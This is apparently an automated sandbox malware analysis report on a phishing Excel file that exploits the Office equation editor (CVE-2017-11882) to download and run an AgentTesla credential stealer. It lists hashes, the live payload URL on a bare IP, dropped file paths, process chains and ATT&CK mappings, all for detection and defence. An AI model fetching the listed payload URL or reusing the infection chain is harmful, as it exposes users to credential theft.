
Analysis Report Catalog of our new order.xlsx

Overview

General Information

Sample Name: Catalog of our new order.xlsx
Analysis ID: 321291
MD5: f19674cfbff25cbd3f128ffd8e78c5c4
SHA1: 07bf03f3b749c3d7f93758068f5a26c520279388
SHA256: 02781481c25663e541fd70525609f84129fb57cf044e57c3e3410972267acc30
Tags: VelvetSweatshop, xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2480 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: 020BC13012CE4DB6E204CB1ED174851E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: vbc.exe PID: 2824 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

        Sigma Overview

        System Summary:

        Sigma detected: Droppers Exploiting CVE-2017-11882
        Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
        Sigma detected: EQNEDT32.EXE connecting to internet
        Source: Network Connection, Author: Joe Security, Data: DestinationIp: 192.158.231.122, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2480, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
        Sigma detected: File Dropped By EQNEDT32EXE
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2480, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe
        Sigma detected: Executables Started in Suspicious Folder
        Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
        Sigma detected: Execution in Non-Executable Folder
        Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
        Sigma detected: Suspicious Program Location Process Starts
        Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824

        Signature Overview

        AV Detection:

        Antivirus detection for URL or domain
        Source: http://192.158.231.122/light.exe Avira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: Catalog of our new order.xlsx ReversingLabs: Detection: 31%
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe Joe Sandbox ML: detected
        Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected

        Exploits:

        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
        Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.158.231.122:80
        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Fri, 20 Nov 2020 12:02:01 GMT Accept-Ranges: bytes ETag: "a0bb98f434bfd61:0" Server: Microsoft-IIS/10.0 Date: Fri, 20 Nov 2020 18:32:05 GMT Content-Length: 618496
        Source: Joe Sandbox View ASN Name: DC74-ASUS DC74-ASUS
        Source: global traffic HTTP traffic detected: GET /light.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.158.231.122 Connection: Keep-Alive
        Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85EDDC46.emf
        Source: vbc.exe, 00000004.00000002.2362766983.0000000004B1F000.00000004.00000001.sdmp String found in binary or memory: http://ns.a88
        Source: vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
        Source: vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

        System Summary:

        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 4 Screenshot OCR: protected documents theyaoww*~ 24 25 26 27 28 29 ~ 30 " " " 31 ' " 32 33 0 0 0 0 0 q 34
        Office equation editor drops PE file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe
        Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exe Code function: 4_2_013CF3A9
        Source: C:\Users\Public\vbc.exe Code function: 4_2_013D0078
        Source: Catalog of our new order.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: light[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: classification engine Classification label: mal100.troj.expl.winXLSX@33204/6@0/1
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Catalog of our new order.xlsx
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE1D6.tmp
        Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
        Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
        Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Catalog of our new order.xlsx Initial sample: OLE indicators vbamacros = False
        Source: Catalog of our new order.xlsx Initial sample: OLE indicators encrypted = True
        Source: initial sample Static PE information: section name: .text entropy: 7.86673164949

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
        Source: Catalog of our new order.xlsx Stream path 'EncryptedPackage' entropy: 7.9980445334 (max. 8.0)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564 Thread sleep time: -480000s >= -30000s
        Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
        Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
        Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
        Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmp Binary or memory string: !Progman
        Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

        Stealing of Sensitive Information:

        Yara detected AgentTesla
        Source: Yara match File source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY

        Remote Access Functionality:

        Yara detected AgentTesla
        Source: Yara match File source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Exploitation for Client Execution 12 | Path Interception | Process Injection 12 | Masquerading 111 | OS Credential Dumping | Virtualization/Sandbox Evasion 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 11 | Security Account Manager | Remote System Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 12 | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 11 | LSA Secrets | System Information Discovery 12 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 2 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label | Link
        Catalog of our new order.xlsx | 31% | ReversingLabs | Document-Word.Exploit.CVE-2017-11882 |

        Dropped Files

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe | 100% | Joe Sandbox ML | |
        C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label | Link
        http://192.158.231.122/light.exe | 100% | Avira URL Cloud | malware |
        http://ns.a88 | 0% | Avira URL Cloud | safe |
        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe |

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://192.158.231.122/light.exe | true | Avira URL Cloud: malware | unknown

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://ns.a88 | vbc.exe, 00000004.00000002.2362766983.0000000004B1F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        https://api.telegram.org/bot%telegramapi%/ | vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp | false | | high
        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          192.158.231.122 | unknown | United States | 17216 | DC74-ASUS | true

          General Information

          Joe Sandbox Version:31.0.0 Red Diamond
          Analysis ID:321291
          Start date:20.11.2020
          Start time:19:30:49
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 35s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:Catalog of our new order.xlsx
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.winXLSX@33204/6@0/1
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 10.3% (good quality ratio 2.9%)
          • Quality average: 23.3%
          • Quality standard deviation: 36.8%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 4
          • Number of non-executed functions: 2
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .xlsx
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
          • Report size exceeded maximum capacity and may have missing behavior information.
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/321291/sample/Catalog of our new order.xlsx

          Simulations

          Behavior and APIs

          Time | Type | Description
          19:32:02 | API Interceptor | 61x Sleep call for process: EQNEDT32.EXE modified
          19:32:04 | API Interceptor | 83x Sleep call for process: vbc.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          Match | Associated Sample Name / URL | Detection | Context
          DC74-ASUS | VEM RFQ.jar | malicious | 192.158.238.66
          DC74-ASUS | VEM RFQ.jar | malicious | 192.158.238.66
          DC74-ASUS | Ordine Novembre.jar | malicious | 192.158.238.122
          DC74-ASUS | Ordine Novembre.jar | malicious | 192.158.238.122
          DC74-ASUS | 20200728.doc | malicious | 155.254.28.158
          DC74-ASUS | Image RFQ_8503231082020.exe | malicious | 155.254.31.51

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:downloaded
          Size (bytes):618496
          Entropy (8bit):7.861639609576483
          Encrypted:false
          SSDEEP:12288:QCuRfLw9sjK8YFIxdsk9fE4ZSgexsOGnAZK0yCcxx:iREr9kFZTOlZ4CW
          MD5:020BC13012CE4DB6E204CB1ED174851E
          SHA1:46F8FF39E0D5F476B0C2E3A1C8FEEFDFEC32A0B2
          SHA-256:265E971392E878A245DEF23CC9544060FCAFBDC0C61C66CF128688F3D64E2179
          SHA-512:891367401D14B9E41FC0379FC0BDC04526E023E01F6E91C731D14C790B8B6483A11761C34B2D5A673B73ACD45761D11916E6A4A6D692C9E4955AD86F7B00B079
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low
          IE Cache URL:http://192.158.231.122/light.exe
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15AE138F.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
          Category:dropped
          Size (bytes):48770
          Entropy (8bit):7.801842363879827
          Encrypted:false
          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
          Malicious:false
          Reputation:moderate, very likely benign file
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E98F844.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
          Category:dropped
          Size (bytes):48770
          Entropy (8bit):7.801842363879827
          Encrypted:false
          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
          Malicious:false
          Reputation:moderate, very likely benign file
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85EDDC46.emf
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1099960
          Entropy (8bit):2.01533581083799
          Encrypted:false
          SSDEEP:3072:IXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:2ahIFdyiaT2qtXw
          MD5:3677D2F9B1FB1BFDA3C51CD719514752
          SHA1:0150A469620426546E26641766F5B21E42079E1A
          SHA-256:549CA31BDF7B3DAC8D37EAE522D786A672438B5CC7241901EE8E0297E53C423A
          SHA-512:A8D0526310681C885C246A8E8EF07AE9F0430A3B6E30A984726D2B0F686C18B447A793C06E41CD46ECE1A4CC99E9A2302577A05F1A89D09CF6E6DC2759B5976F
          Malicious:false
          Reputation:low
          C:\Users\user\Desktop\~$Catalog of our new order.xlsx
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):330
          Entropy (8bit):1.4377382811115937
          Encrypted:false
          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
          MD5:96114D75E30EBD26B572C1FC83D1D02E
          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          C:\Users\Public\vbc.exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):618496
          Entropy (8bit):7.861639609576483
          Encrypted:false
          SSDEEP:12288:QCuRfLw9sjK8YFIxdsk9fE4ZSgexsOGnAZK0yCcxx:iREr9kFZTOlZ4CW
          MD5:020BC13012CE4DB6E204CB1ED174851E
          SHA1:46F8FF39E0D5F476B0C2E3A1C8FEEFDFEC32A0B2
          SHA-256:265E971392E878A245DEF23CC9544060FCAFBDC0C61C66CF128688F3D64E2179
          SHA-512:891367401D14B9E41FC0379FC0BDC04526E023E01F6E91C731D14C790B8B6483A11761C34B2D5A673B73ACD45761D11916E6A4A6D692C9E4955AD86F7B00B079
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low

          Static File Info

          General

          File type:CDFV2 Encrypted
          Entropy (8bit):7.961529951482354
          TrID:
          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
          File name:Catalog of our new order.xlsx
          File size:201728
          MD5:f19674cfbff25cbd3f128ffd8e78c5c4
          SHA1:07bf03f3b749c3d7f93758068f5a26c520279388
          SHA256:02781481c25663e541fd70525609f84129fb57cf044e57c3e3410972267acc30
          SHA512:f6dd6fd3e49fa5969ee68e45afc78033996bd0436e6e2a1ffb283dbb1f4bf64a063cce741661e8f9a8439453821ea01d30511f519b1cf722694c89a7657c5554
          SSDEEP:3072:PzGYLG33rIUfDOffUxO7Erc6ROgxGQZsWCrA30hksSCtGhH54dbBfoUcQuVAPtmJ:aYLRUbXOYrXGohLHC+CdbBwYRkYW

          File Icon

          Icon Hash:e4e2aa8aa4b4bcb4

          Static OLE Info

          General

          Document Type:OLE
          Number of OLE Files:1

          OLE File "Catalog of our new order.xlsx"

          Indicators

          Has Summary Info:False
          Application Name:unknown
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:False
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:
          Flash Objects Count:
          Contains VBA Macros:False

          Streams

          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
          General
          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
          File Type:data
          Stream Size:64
          Entropy:2.73637206947
          Base64 Encoded:False
          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
          General
          Stream Path:\x6DataSpaces/DataSpaceMap
          File Type:data
          Stream Size:112
          Entropy:2.7597816111
          Base64 Encoded:False
          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
          General
          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
          File Type:data
          Stream Size:200
          Entropy:3.13335930328
          Base64 Encoded:False
          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
          General
          Stream Path:\x6DataSpaces/Version
          File Type:data
          Stream Size:76
          Entropy:2.79079600998
          Base64 Encoded:False
          Stream Path: EncryptedPackage, File Type: data, Stream Size: 194952
          General
          Stream Path:EncryptedPackage
          File Type:data
          Stream Size:194952
          Entropy:7.9980445334
          Base64 Encoded:True
          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
          General
          Stream Path:EncryptionInfo
          File Type:data
          Stream Size:224
          Entropy:4.56726522318
          Base64 Encoded:False

          Network Behavior

          TCP Packets

          Nov 20, 2020 19:32:05.915277004 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915304899 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915332079 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915342093 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915359020 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915443897 CET4916780192.168.2.22192.158.231.122
